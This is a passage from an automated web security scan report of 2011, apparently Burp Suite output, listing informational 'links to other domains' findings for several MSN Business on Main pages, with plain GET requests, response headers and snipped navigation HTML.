<li class="first"><a href="http://www.facebook.com/pages/Business-on-Main/162288430462194" onclick="return Msn.Navigation.OpenNew(event, this)"><img src="http://blstb.msn.com/i/75/879DDAEC9FAEC927456F7EF14C866C.png" width="25" height="25" alt="Facebook" />
...[SNIP]...
<li><a href="http://twitter.com/businessonmain" onclick="return Msn.Navigation.OpenNew(event, this)"><img src="http://blstb.msn.com/i/70/661149A5243780BB5C34B30989D84.png" width="25" height="26" alt="Twitter" />
...[SNIP]...
<li><a href="http://youtube.com/businessonmain" onclick="return Msn.Navigation.OpenNew(event, this)"><img src="http://blstb.msn.com/i/D2/E140B3BB99D7595CE751D4A1D3C.png" width="25" height="25" alt="YouTube" />
...[SNIP]...
<li id="community" class="menuitem"><a href="http://businessonmain.liveworld.com" _menuid="community">COMMUNITY</a>
...[SNIP]...
<li id="profile" class="menuitem first"><a href="http://businessonmain.liveworld.com/BoM-profile.jspa" _menuid="profile">PROFILE</a></li><li id="groups" class="menuitem"><a href="http://businessonmain.liveworld.com/groups/Groups/800000000" _menuid="groups">GROUPS</a></li><li id="contacts" class="menuitem"><a href="http://businessonmain.liveworld.com/BoM-contacts.jspa" _menuid="contacts">CONTACTS</a></li><li id="messages" class="menuitem"><a href="http://businessonmain.liveworld.com/BoM-messages.jspa" _menuid="messages">MESSAGES</a></li><li id="memberdirectory" class="menuitem"><a href="http://businessonmain.liveworld.com/businessdirectory.jspa" _menuid="memberdirectory">MEMBER DIRECTORY</a>
...[SNIP]...
<li id="accountsettings" class="menuitem last"><a href="http://businessonmain.liveworld.com/BoM-usersettings.jspa" _menuid="accountsettings">ACCOUNT SETTINGS</a>
...[SNIP]...
xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xhtml="http://www.w3.org/1999/xhtml" xmlns:xd="http://schemas.microsoft.com/office/infopath/2003">
Please check this box to accept the <a href="http://help.live.com/help.aspx?project=tou&mkt=en-us" target="_blank">Terms of Service</a>. Std msg charges apply. By submitting the phone number you acknowledge you are the acct holder or have acct holder's permission to do so. To cancel text STOP or for help text HELP to 46676. <a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_blank">Privacy</a>
...[SNIP]...
<div><iframe id="fblikeframe" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:300px; height:80px;" src="http://www.facebook.com/plugins/like.php?href=http://businessonmain.msn.com/browseresources/articles/firststeps.aspx?cp-documentid=26675647&layout=standard&show_faces=false&width=300&action=like&colorscheme=light&height=80"></iframe>
...[SNIP]...
<li class="first"><a href="http://businessonmain.liveworld.com/topic/Inspired-Entrepreneurs/Discussion-Topics/Did-Aha-Moment/800003844">Discuss: Did You Have An Aha Moment?</a>
...[SNIP]...
<span style="FONT-SIZE: 9pt"><a href="http://www.smallbizdaily.com/">www.smallbizdaily.com</a>. Lesonsky is CEO of <a href="http://www.growbizmedia.com/">GrowBiz Media</a>
...[SNIP]...
<li class="first"><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://help.live.com/help.aspx?project=tou&mkt=en-us">Terms of Use</a>
...[SNIP]...
<li><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://help.live.com/help.aspx?project=tou&mkt=en-us#faq0">Code of Conduct</a>
...[SNIP]...
<li class="last"><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.microsoft.com/library/toolbar/3.0/trademarks/en-us.mspx">Trademark</a>
...[SNIP]...
</script><script type="text/javascript" src="https://amch.questionmarket.com/adsc/d746470/3/746471/randm.js"></script>
...[SNIP]...

17.68. http://businessonmain.msn.com/browseresources/articles/managingemployees.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://businessonmain.msn.com
Path:	/browseresources/articles/managingemployees.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://businessonmain.msn.com/browseresources/articles/managingemployees.aspx?cp-documentid=26643311&source=msneditorial&gt1=25049

The response contains the following links to other domains:

http://businessonmain.liveworld.com/
http://businessonmain.liveworld.com/BoM-contacts.jspa
http://businessonmain.liveworld.com/BoM-messages.jspa
http://businessonmain.liveworld.com/BoM-profile.jspa
http://businessonmain.liveworld.com/BoM-usersettings.jspa
http://businessonmain.liveworld.com/businessdirectory.jspa
http://businessonmain.liveworld.com/clubpost!default.jspa?forumID=800003193
http://businessonmain.liveworld.com/groups/Groups/800000000
http://download.live.com/?sku=messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://help.live.com/help.aspx?project=tou&mkt=en-us
http://insidemsn.wordpress.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://twitter.com/businessonmain
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?FORM=BEETSBS&mkt=en-us
http://www.bing.com/search?q=site%3Abusinessonmain.msn.com+%22Toddi+Gutner%22&form=QBRE&qs=n&sk=&sc=1-42
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.facebook.com/pages/Business-on-Main/162288430462194
http://www.facebook.com/plugins/like.php?href=http://businessonmain.msn.com/browseresources/articles/managingemployees.aspx?cp-documentid=26643311&layout=standard&show_faces=false&width=300&action=like&colorscheme=light&height=80
http://www.microsoft.com/library/toolbar/3.0/trademarks/en-us.mspx
http://www.sprint.com/business
http://youtube.com/businessonmain
https://amch.questionmarket.com/adsc/d746470/2/746472/randm.js
https://amch.questionmarket.com/adsc/d746470/3/746471/randm.js
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296574241&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fbusinessonmain.msn.com%2Fbrowseresources%2Farticles%2Fmanagingemployees.aspx%3Fcp-documentid%3D26643311%26source%3Dmsneditorial%26gt1%3D25049&lc=1033&id=264792
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:30:41 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=49639c13297e45b088d53cc2947d18eb; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=BFF6A2643B34482D9EFC461635B43FB3; domain=.msn.com; expires=Sat, 20-Aug-2011 15:30:41 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 48599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><noscript><m
...[SNIP]...
<body class=""><script type="text/javascript" src="https://amch.questionmarket.com/adsc/d746470/2/746472/randm.js"></script>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=BEETSBS&mkt=en-us">Bing</a>
...[SNIP]...
<li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296574241&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fbusinessonmain.msn.com%2Fbrowseresources%2Farticles%2Fmanagingemployees.aspx%3Fcp-documentid%3D26643311%26source%3Dmsneditorial%26gt1%3D25049&lc=1033&id=264792" class="dMSNME_1">Sign In</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Web</a>
...[SNIP]...
<li class="last"><a href="http://www.sprint.com/business" title="Brought to You By Sprint" onclick="return Msn.Navigation.OpenNew(event, this)"><img src="http://blstb.msn.com/i/C2/F78B5FD8886A5028961034FD49E2.png" width="234" height="44" alt="Brought to You By Sprint" />
...[SNIP]...
<li class="first"><a href="http://www.facebook.com/pages/Business-on-Main/162288430462194" onclick="return Msn.Navigation.OpenNew(event, this)"><img src="http://blstb.msn.com/i/75/879DDAEC9FAEC927456F7EF14C866C.png" width="25" height="25" alt="Facebook" />
...[SNIP]...
<li><a href="http://twitter.com/businessonmain" onclick="return Msn.Navigation.OpenNew(event, this)"><img src="http://blstb.msn.com/i/70/661149A5243780BB5C34B30989D84.png" width="25" height="26" alt="Twitter" />
...[SNIP]...
<li><a href="http://youtube.com/businessonmain" onclick="return Msn.Navigation.OpenNew(event, this)"><img src="http://blstb.msn.com/i/D2/E140B3BB99D7595CE751D4A1D3C.png" width="25" height="25" alt="YouTube" />
...[SNIP]...
<li id="community" class="menuitem"><a href="http://businessonmain.liveworld.com" _menuid="community">COMMUNITY</a>
...[SNIP]...
<li id="profile" class="menuitem first"><a href="http://businessonmain.liveworld.com/BoM-profile.jspa" _menuid="profile">PROFILE</a></li><li id="groups" class="menuitem"><a href="http://businessonmain.liveworld.com/groups/Groups/800000000" _menuid="groups">GROUPS</a></li><li id="contacts" class="menuitem"><a href="http://businessonmain.liveworld.com/BoM-contacts.jspa" _menuid="contacts">CONTACTS</a></li><li id="messages" class="menuitem"><a href="http://businessonmain.liveworld.com/BoM-messages.jspa" _menuid="messages">MESSAGES</a></li><li id="memberdirectory" class="menuitem"><a href="http://businessonmain.liveworld.com/businessdirectory.jspa" _menuid="memberdirectory">MEMBER DIRECTORY</a>
...[SNIP]...
<li id="accountsettings" class="menuitem last"><a href="http://businessonmain.liveworld.com/BoM-usersettings.jspa" _menuid="accountsettings">ACCOUNT SETTINGS</a>
...[SNIP]...
xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xhtml="http://www.w3.org/1999/xhtml" xmlns:xd="http://schemas.microsoft.com/office/infopath/2003">
Please check this box to accept the <a href="http://help.live.com/help.aspx?project=tou&mkt=en-us" target="_blank">Terms of Service</a>. Std msg charges apply. By submitting the phone number you acknowledge you are the acct holder or have acct holder's permission to do so. To cancel text STOP or for help text HELP to 46676. <a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_blank">Privacy</a>
...[SNIP]...
<div><iframe id="fblikeframe" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:300px; height:80px;" src="http://www.facebook.com/plugins/like.php?href=http://businessonmain.msn.com/browseresources/articles/managingemployees.aspx?cp-documentid=26643311&layout=standard&show_faces=false&width=300&action=like&colorscheme=light&height=80"></iframe>
...[SNIP]...
<li class="first"><a href="http://businessonmain.liveworld.com/clubpost!default.jspa?forumID=800003193">Discuss: How's the Event Planning Business?</a>
...[SNIP]...
<em><a href="http://www.bing.com/search?q=site%3Abusinessonmain.msn.com+%22Toddi+Gutner%22&form=QBRE&qs=n&sk=&sc=1-42">Toddi Gutner</a>
...[SNIP]...
<li class="first"><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://help.live.com/help.aspx?project=tou&mkt=en-us">Terms of Use</a>
...[SNIP]...
<li><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://help.live.com/help.aspx?project=tou&mkt=en-us#faq0">Code of Conduct</a>
...[SNIP]...
<li class="last"><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.microsoft.com/library/toolbar/3.0/trademarks/en-us.mspx">Trademark</a>
...[SNIP]...
</script><script type="text/javascript" src="https://amch.questionmarket.com/adsc/d746470/3/746471/randm.js"></script>
...[SNIP]...

17.69. http://businessonmain.msn.com/questions/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://businessonmain.msn.com
Path:	/questions/default.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://businessonmain.msn.com/questions/default.aspx?cp-documentid=26485570&source=msneditorial&gt1=25049

The response contains the following links to other domains:

http://businessonmain.liveworld.com/
http://businessonmain.liveworld.com/BoM-contacts.jspa
http://businessonmain.liveworld.com/BoM-messages.jspa
http://businessonmain.liveworld.com/BoM-profile.jspa
http://businessonmain.liveworld.com/BoM-usersettings.jspa
http://businessonmain.liveworld.com/businessdirectory.jspa
http://businessonmain.liveworld.com/groups/Groups/800000000
http://download.live.com/?sku=messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://help.live.com/help.aspx?project=tou&mkt=en-us
http://insidemsn.wordpress.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://twitter.com/businessonmain
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?FORM=BEETSBS&mkt=en-us
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.facebook.com/pages/Business-on-Main/162288430462194
http://www.microsoft.com/library/toolbar/3.0/trademarks/en-us.mspx
http://www.sprint.com/business
http://youtube.com/businessonmain
https://amch.questionmarket.com/adsc/d746470/2/746472/randm.js
https://amch.questionmarket.com/adsc/d746470/3/746471/randm.js
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296574237&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fbusinessonmain.msn.com%2Fquestions%2Fdefault.aspx%3Fcp-documentid%3D26485570%26source%3Dmsneditorial%26gt1%3D25049&lc=1033&id=264792
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /questions/default.aspx?cp-documentid=26485570&source=msneditorial&gt1=25049 HTTP/1.1
Host: businessonmain.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:30:37 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA55
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=53eab0294d11440c8728e439eeffc3c3; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=0778D711421840BCB51A53DA013FF171; domain=.msn.com; expires=Sat, 20-Aug-2011 15:30:37 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 45060

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><noscript><m
...[SNIP]...
<body class=""><script type="text/javascript" src="https://amch.questionmarket.com/adsc/d746470/2/746472/randm.js"></script>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=BEETSBS&mkt=en-us">Bing</a>
...[SNIP]...
<li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296574237&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fbusinessonmain.msn.com%2Fquestions%2Fdefault.aspx%3Fcp-documentid%3D26485570%26source%3Dmsneditorial%26gt1%3D25049&lc=1033&id=264792" class="dMSNME_1">Sign In</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Web</a>
...[SNIP]...
<li class="last"><a href="http://www.sprint.com/business" title="Brought to You By Sprint" onclick="return Msn.Navigation.OpenNew(event, this)"><img src="http://blstb.msn.com/i/C2/F78B5FD8886A5028961034FD49E2.png" width="234" height="44" alt="Brought to You By Sprint" />
...[SNIP]...
<li class="first"><a href="http://www.facebook.com/pages/Business-on-Main/162288430462194" onclick="return Msn.Navigation.OpenNew(event, this)"><img src="http://blstb.msn.com/i/75/879DDAEC9FAEC927456F7EF14C866C.png" width="25" height="25" alt="Facebook" />
...[SNIP]...
<li><a href="http://twitter.com/businessonmain" onclick="return Msn.Navigation.OpenNew(event, this)"><img src="http://blstb.msn.com/i/70/661149A5243780BB5C34B30989D84.png" width="25" height="26" alt="Twitter" />
...[SNIP]...
<li><a href="http://youtube.com/businessonmain" onclick="return Msn.Navigation.OpenNew(event, this)"><img src="http://blstb.msn.com/i/D2/E140B3BB99D7595CE751D4A1D3C.png" width="25" height="25" alt="YouTube" />
...[SNIP]...
<li id="community" class="menuitem"><a href="http://businessonmain.liveworld.com" _menuid="community">COMMUNITY</a>
...[SNIP]...
<li id="profile" class="menuitem first"><a href="http://businessonmain.liveworld.com/BoM-profile.jspa" _menuid="profile">PROFILE</a></li><li id="groups" class="menuitem"><a href="http://businessonmain.liveworld.com/groups/Groups/800000000" _menuid="groups">GROUPS</a></li><li id="contacts" class="menuitem"><a href="http://businessonmain.liveworld.com/BoM-contacts.jspa" _menuid="contacts">CONTACTS</a></li><li id="messages" class="menuitem"><a href="http://businessonmain.liveworld.com/BoM-messages.jspa" _menuid="messages">MESSAGES</a></li><li id="memberdirectory" class="menuitem"><a href="http://businessonmain.liveworld.com/businessdirectory.jspa" _menuid="memberdirectory">MEMBER DIRECTORY</a>
...[SNIP]...
<li id="accountsettings" class="menuitem last"><a href="http://businessonmain.liveworld.com/BoM-usersettings.jspa" _menuid="accountsettings">ACCOUNT SETTINGS</a>
...[SNIP]...
<li class="first"><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://help.live.com/help.aspx?project=tou&mkt=en-us">Terms of Use</a>
...[SNIP]...
<li><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://help.live.com/help.aspx?project=tou&mkt=en-us#faq0">Code of Conduct</a>
...[SNIP]...
<li class="last"><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.microsoft.com/library/toolbar/3.0/trademarks/en-us.mspx">Trademark</a>
...[SNIP]...
</script><script type="text/javascript" src="https://amch.questionmarket.com/adsc/d746470/3/746471/randm.js"></script>
...[SNIP]...

17.70. http://businessonmain.msn.com/videos/coolrunnings.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://businessonmain.msn.com
Path:	/videos/coolrunnings.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://businessonmain.msn.com/videos/coolrunnings.aspx?cp-documentid=26925865&source=msneditorial&gt1=25049

The response contains the following links to other domains:

http://businessonmain.liveworld.com/
http://businessonmain.liveworld.com/BoM-contacts.jspa
http://businessonmain.liveworld.com/BoM-messages.jspa
http://businessonmain.liveworld.com/BoM-profile.jspa
http://businessonmain.liveworld.com/BoM-usersettings.jspa
http://businessonmain.liveworld.com/businessdirectory.jspa
http://businessonmain.liveworld.com/groups/Groups/800000000
http://download.live.com/?sku=messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://help.live.com/help.aspx?project=tou&mkt=en-us
http://insidemsn.wordpress.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://twitter.com/businessonmain
http://www.adobe.com/downloads/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?FORM=BEETSBS&mkt=en-us
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.facebook.com/pages/Business-on-Main/162288430462194
http://www.facebook.com/plugins/like.php?href=http://businessonmain.msn.com/videos/coolrunnings.aspx?cp-documentid=26925865&layout=standard&show_faces=false&width=450&action=like&colorscheme=light&height=80
http://www.microsoft.com/library/toolbar/3.0/trademarks/en-us.mspx
http://www.sprint.com/business
http://youtube.com/businessonmain
https://amch.questionmarket.com/adsc/d746470/2/746472/randm.js
https://amch.questionmarket.com/adsc/d746470/3/746471/randm.js
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296574233&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fbusinessonmain.msn.com%2Fvideos%2Fcoolrunnings.aspx%3Fcp-documentid%3D26925865%26source%3Dmsneditorial%26gt1%3D25049&lc=1033&id=264792
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /videos/coolrunnings.aspx?cp-documentid=26925865&source=msneditorial&gt1=25049 HTTP/1.1
Host: businessonmain.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:30:33 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA50
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=bc894af751ee40e599d2c2518f799e93; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=4CB5B36BE4B744C6A233459D70E52BAF; domain=.msn.com; expires=Sat, 20-Aug-2011 15:30:33 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 70173

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><noscript><m
...[SNIP]...
<body class=""><script type="text/javascript" src="https://amch.questionmarket.com/adsc/d746470/2/746472/randm.js"></script>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=BEETSBS&mkt=en-us">Bing</a>
...[SNIP]...
